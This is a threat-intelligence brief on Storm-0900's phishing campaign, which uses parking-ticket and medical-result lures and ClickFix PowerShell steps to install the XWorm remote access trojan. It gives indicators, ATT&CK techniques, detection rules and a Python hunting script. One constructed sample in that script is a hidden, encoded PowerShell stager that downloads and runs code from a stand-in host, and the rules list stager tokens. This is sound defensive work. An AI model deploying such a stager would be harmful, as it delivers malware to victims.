Storm-0900 XWorm Phishing Campaign
Targeted sectors
· General users
o Likely cross-sector, focused on credential harvesting and general compromise.
Countries
Primarily United States.
BLUF
High-volume phishing emails using parking ticket and medical test themes trick users into running malicious PowerShell scripts to install XWorm malware.
Date of first reported activity
· Observed and blocked by Microsoft on November 26, 2025.
Date of last reported activity update
· December 10, 2025.
APT names
· None specified
Associated criminal organization names
· Storm-0900 (Microsoft naming convention for an activity cluster).
IOCs
Key C2 Infrastructure Characteristics
· Dynamic and Evasive: Storm-0900 is known for its high-volume, weekly campaigns that leverage "agile" infrastructure which is constantly rotated to evade detection.
· Abuse of Legitimate Services: The group frequently uses legitimate infrastructure for parts of its attack chain, making simple domain blocking difficult.
· AWS URLs: Recent campaigns (observed in November 2025) used unique Amazon Web Services (AWS) URLs for the initial landing pages that hosted the "ClickFix" social engineering lures. These are not fixed C2 domains but temporary file hosting links.
· Public DNS over HTTPS (DoH) Resolvers: The XWorm malware uses legitimate DoH services (like Cloudflare's 1.1.1.1 or Google's 8.8.8.8) to resolve its actual hard-coded C2 addresses in an encrypted manner, further hiding the malicious destination from standard network monitoring.
TTPs:
· T1566.002: Phishing: Spear-phishing Link.
· T1059.001: Command and Scripting Interpreter: PowerShell (Execution via malicious ClickFix step).
· T1204.001: User Execution: Malicious Link.
Malware names
· XWorm (Remote Access Trojan).
Malware sample
sha256
b7b8016b837766fc9a8d6cfeec6239c05778eec6525bc61327b6311427c4a289
URL link to sample
hxxps://bazaar.abuse.ch/sample/b7b8016b837766fc9a8d6cfeec6239c05778eec6525bc61327b6311427c4a289/
CVEs and CVSS Vectors
· Not applicable
Nessus ID
· Not applicable
Suggested rules / potential hunts
Suggested Suricata rules
Look for rules detecting common XWorm C2 activity or unusual PowerShell execution network connections.
Suggested SentinelOne rules
Trigger alerts for execution of powershell.exe that contains base64-encoded strings and subsequently initiates network connections to unusual domains or IPs.
Suspicious PowerShell Base64String Execution
event.type == "Process Creation" AND
tgt.process.name contains "powershell.exe" AND
(tgt.process.cmdline contains "-encodedcommand" OR
tgt.process.cmdline contains "-enc" OR
tgt.process.cmdline contains "-nop" OR
tgt.process.cmdline contains "-c") AND
tgt.process.cmdline contains "FromBase64String"
Suggested Splunk hunts
index=<your_windows_logs> "powershell.exe" | where match(_raw, "(?i)(IEX|DownloadString|bitsadmin)") (Monitor for obfuscated PowerShell commands related to file transfer. Splunk's like() only understands SQL-style % and _ wildcards, so the regex alternation needs match(); replace <your_windows_logs> with the index that holds your Windows event logs.)
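The SentinelOne rule and the Splunk hunt above both key on the visible command line, which misses the case where the stager is hidden inside a -EncodedCommand blob. The following added example (not from the original report, Microsoft, or any vendor) applies the same flag-plus-token logic in Python and additionally decodes the UTF-16LE base64 payload before token matching; the command lines it runs over are constructed samples, not real incident data.

```python
import base64
import re

# Tokens taken from the page's SentinelOne rule and Splunk hunt.
SUSPICIOUS_FLAGS = ("-encodedcommand", "-enc", "-nop", "-c")
STAGER_RE = re.compile(r"IEX|Invoke-Expression|DownloadString|bitsadmin|FromBase64String", re.I)
# -e / -enc / -EncodedCommand followed by a base64 blob (a UTF-16LE script).
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline: str) -> str:
    """Decode a -EncodedCommand payload, or return '' if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def classify(cmdline: str) -> dict:
    """Apply the page's rule: PowerShell + suspicious flag + stager/base64 token."""
    low = cmdline.lower()
    is_ps = "powershell" in low
    decoded = decode_encoded_command(cmdline) if is_ps else ""
    # Substring matching is deliberately crude, like the rule: "-nop" also hits
    # -NoProfile, which is why a stager token is required as well.
    flags = [f for f in SUSPICIOUS_FLAGS if f in low]
    # Search the visible command line (base64 blob removed) plus the decoded script.
    text = ENC_RE.sub(" ", cmdline) + " " + decoded
    tokens = sorted({t.lower() for t in STAGER_RE.findall(text)})
    return {"powershell": is_ps, "flags": flags, "stager_tokens": tokens,
            "decoded": decoded, "suspicious": is_ps and bool(flags) and bool(tokens)}

def hunt(events):
    """Return the command lines the rule would alert on."""
    return [e for e in events if classify(e)["suspicious"]]

def _encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample command lines (not from a real incident). The first mimics a
# ClickFix-style encoded stager, the second a base64 helper, the third is benign.
SAMPLE_EVENTS = [
    "powershell.exe -nop -w hidden -enc " + _encode(
        "IEX ((New-Object Net.WebClient).DownloadString('http://example.invalid/stage'))"),
    'powershell.exe -c "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\'aGVsbG8=\'))"',
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for e in hunt(SAMPLE_EVENTS):
        print("ALERT:", classify(e)["stager_tokens"], e[:60])
```

The benign third sample shows why the ANDed stager token matters: "-nop" alone would also fire on -NoProfile.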
Delivery method
High-volume phishing emails using social engineering.
Email samples
Themes
Emails use urgent or curiosity-inducing social engineering themes.
· "Parking Ticket" notifications, sometimes referencing local law enforcement.
· "Medical Test Result" notifications, sometimes referencing government health agencies or specific healthcare companies.
· Generic "Invoice" lures.
Subject Lines: Often personalized or highly relevant to current events (e.g., a campaign around Thanksgiving referenced the holiday).
Sender: Generic salutations (e.g., "Hi") and vague signatures (e.g., "Account Officer") are common.
References
The Hacker News
· hxxps://thehackernews.com/2025/12/threatsday-bulletin-wi-fi-hack-npm-worm.html
MalwareBazaar
· hxxps://bazaar.abuse.ch/sample/b7b8016b837766fc9a8d6cfeec6239c05778eec6525bc61327b6311427c4a289/
X
· hxxps://x.com/MsftSecIntel/status/1995649245408301308
Cyber NJ
· hxxps://www.cyber.nj.gov/Home/Components/News/News/1871/214
MalwareBytes
· hxxps://www.malwarebytes.com/blog/threats/2025/11/we-opened-a-fake-invoice-and-fell-down-a-retro-xworm-shaped-wormhole